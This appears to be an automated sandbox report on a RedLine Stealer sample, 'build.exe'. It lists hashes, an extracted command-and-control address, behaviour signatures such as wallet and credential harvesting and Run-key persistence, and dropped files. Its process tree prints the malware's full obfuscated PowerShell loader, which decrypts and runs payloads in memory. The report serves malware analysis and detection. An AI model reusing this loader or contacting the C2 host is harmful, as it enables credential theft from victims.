Analysis
max time kernel: 195s
max time network: 300s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 05-05-2024 18:01
Static task: static1
Behavioral task: behavioral1 (Sample: build.exe, Resource: win10-20240404-en)
Behavioral task: behavioral2 (Sample: build.exe, Resource: win10v2004-20240226-en)
Behavioral task: behavioral3 (Sample: build.exe, Resource: win11-20240419-en)
General
Target: build.exe
Size: 351KB
MD5: e00381635f0deee1380080b322aec301
SHA1: 751c7ac25d1cbd1a789bea64f46bb226d9cd43e1
SHA256: 18c790568c6e0e30d600135a33a9e41ff55e076600fec006772d95849abc4def
SHA512: f401016e001ffad5e731c6afb333acd3124dd8c9d2187b06cc38a4094cb2e67bfd5b8a732587df92ab34bd4902b94cdc5ab5aeb413af857777fb5e5fd13b62a3
SSDEEP: 6144:Vkup0yN90QEsvxUDJchSJrcu78hp1mQlZDJ0ML:Wy900WDJLJrtKp1mGRJ0g
Malware Config
Extracted
Family: redline
Botnet: cheat
C2: ii-restored.gl.at.ply.gg:43416
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- RedLine payload (1 IoCs)
  Processes:
  resource: behavioral1/memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp; yara_rule: family_redline
- SectopRAT payload (1 IoCs)
  Processes:
  resource: behavioral1/memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp; yara_rule: family_sectoprat
- Blocklisted process makes network request (6 IoCs)
  Processes:
  flow 3, pid 4868, powershell.exe
  flow 5, pid 4868, powershell.exe
  flow 7, pid 4868, powershell.exe
  flow 8, pid 4868, powershell.exe
  flow 9, pid 4868, powershell.exe
  flow 11, pid 4868, powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 1 IoCs)
  Processes:
  description: Set value (str)
  ioc: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
  process: build.exe
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes:
  pid 4868, powershell.exe (5 occurrences)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  description: Token: SeDebugPrivilege; pid 4868, powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes:
  PID 1900 wrote to memory of 5088: build.exe -> cmd.exe
  PID 1900 wrote to memory of 5088: build.exe -> cmd.exe
  PID 5088 wrote to memory of 4868: cmd.exe -> powershell.exe
  PID 5088 wrote to memory of 4868: cmd.exe -> powershell.exe
  PID 5088 wrote to memory of 4868: cmd.exe -> powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\build.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\build.exe"
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\cmd.exe (level 2)
    Command line: cmd /c "build.bat"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('imoYPv8IKhFzZbUQGc9tLwtVTdE/LpsrhzYrOXefWdo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('g+kpXPmwAsGMTyt1EM/xyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tjyzH=New-Object System.IO.MemoryStream(,$param_var); $xDXZb=New-Object System.IO.MemoryStream; $QPesd=New-Object System.IO.Compression.GZipStream($tjyzH, [IO.Compression.CompressionMode]::Decompress); $QPesd.CopyTo($xDXZb); $QPesd.Dispose(); $tjyzH.Dispose(); $xDXZb.Dispose(); $xDXZb.ToArray();}function execute_function($param_var,$param2_var){ $hVNQH=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uKjxO=$hVNQH.EntryPoint; $uKjxO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$rMjrX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($NJxiO in $rMjrX) { if ($NJxiO.StartsWith(':: ')) { $kXTzm=$NJxiO.Substring(3); break; }}$payloads_var=[string[]]$kXTzm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat
  Filesize: 276KB
  MD5: 717c25dae776217fbc92897c79fb72b2
  SHA1: c3d1bbe2b559c0c18423b80bee499f0d23b3b477
  SHA256: 8c3def6d2728ca908b96df1ee12de65b03ca1e4975bbc65813154b846058b949
  SHA512: 4f9a1a953951cbd0cf112939d973fde0dbaff92a4a2149e619ba39998c379ff62d01c6af03005a2c03831d0d989303a7bf3c0c12ba1b3bf85d1b90ab05dd264d
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_at5kko5t.gqk.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- C:\Users\Admin\AppData\Local\Temp\tmpF05.tmp
  Filesize: 46KB
  MD5: 02d2c46697e3714e49f46b680b9a6b83
  SHA1: 84f98b56d49f01e9b6b76a4e21accf64fd319140
  SHA256: 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
  SHA512: 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
- C:\Users\Admin\AppData\Local\Temp\tmpF1A.tmp
  Filesize: 92KB
  MD5: 55d8864e58f075cbe2dbd43a1b2908a9
  SHA1: 0d7129d95fa2ddb7fde828b22441dc53dffc5594
  SHA256: e4e07f45a83a87aff5e7f99528464abaad495499e9e2e3e0fcd5897819f88581
  SHA512: 89ce123d2685448826f76dce25292b2d2d525efd8b78fd9235d1e357ad7ae2d4b3461ef903e2994cd2b8e28f56b0cc50137dd90accdd3f281472e488f6c7cf2e
- C:\Users\Admin\AppData\Local\Temp\tmpFC3.tmp
  Filesize: 96KB
  MD5: d367ddfda80fdcf578726bc3b0bc3e3c
  SHA1: 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
  SHA256: 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
  SHA512: 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77
- memory/4868-39-0x0000000008B10000-0x0000000008B46000-memory.dmp (Filesize: 216KB)
- memory/4868-47-0x0000000008FC0000-0x0000000008FFE000-memory.dmp (Filesize: 248KB)
- memory/4868-13-0x0000000006D70000-0x0000000006DD6000-memory.dmp (Filesize: 408KB)
- memory/4868-14-0x0000000007440000-0x00000000074A6000-memory.dmp (Filesize: 408KB)
- memory/4868-15-0x0000000007620000-0x0000000007970000-memory.dmp (Filesize: 3.3MB)
- memory/4868-18-0x00000000074B0000-0x00000000074CC000-memory.dmp (Filesize: 112KB)
- memory/4868-19-0x0000000007AB0000-0x0000000007AFB000-memory.dmp (Filesize: 300KB)
- memory/4868-20-0x0000000007CD0000-0x0000000007D46000-memory.dmp (Filesize: 472KB)
- memory/4868-11-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-31-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-36-0x0000000009520000-0x0000000009B98000-memory.dmp (Filesize: 6.5MB)
- memory/4868-37-0x0000000008A90000-0x0000000008AAA000-memory.dmp (Filesize: 104KB)
- memory/4868-38-0x0000000008AD0000-0x0000000008AD8000-memory.dmp (Filesize: 32KB)
- memory/4868-9-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-42-0x0000000008DF0000-0x0000000008E0E000-memory.dmp (Filesize: 120KB)
- memory/4868-45-0x000000000A1B0000-0x000000000A7B6000-memory.dmp (Filesize: 6.0MB)
- memory/4868-46-0x0000000008F60000-0x0000000008F72000-memory.dmp (Filesize: 72KB)
- memory/4868-12-0x0000000006CD0000-0x0000000006CF2000-memory.dmp (Filesize: 136KB)
- memory/4868-48-0x0000000009140000-0x000000000924A000-memory.dmp (Filesize: 1.0MB)
- memory/4868-74-0x0000000073B2E000-0x0000000073B2F000-memory.dmp (Filesize: 4KB)
- memory/4868-75-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-84-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-99-0x0000000009D70000-0x0000000009F32000-memory.dmp (Filesize: 1.8MB)
- memory/4868-100-0x000000000ACF0000-0x000000000B21C000-memory.dmp (Filesize: 5.2MB)
- memory/4868-101-0x000000000B220000-0x000000000B71E000-memory.dmp (Filesize: 5.0MB)
- memory/4868-242-0x0000000009BA0000-0x0000000009C32000-memory.dmp (Filesize: 584KB)
- memory/4868-243-0x0000000007DF0000-0x0000000007E0E000-memory.dmp (Filesize: 120KB)
- memory/4868-244-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-251-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)
- memory/4868-10-0x0000000006E10000-0x0000000007438000-memory.dmp (Filesize: 6.2MB)
- memory/4868-8-0x00000000067A0000-0x00000000067D6000-memory.dmp (Filesize: 216KB)
- memory/4868-5-0x0000000073B2E000-0x0000000073B2F000-memory.dmp (Filesize: 4KB)
- memory/4868-440-0x0000000073B20000-0x000000007420E000-memory.dmp (Filesize: 6.9MB)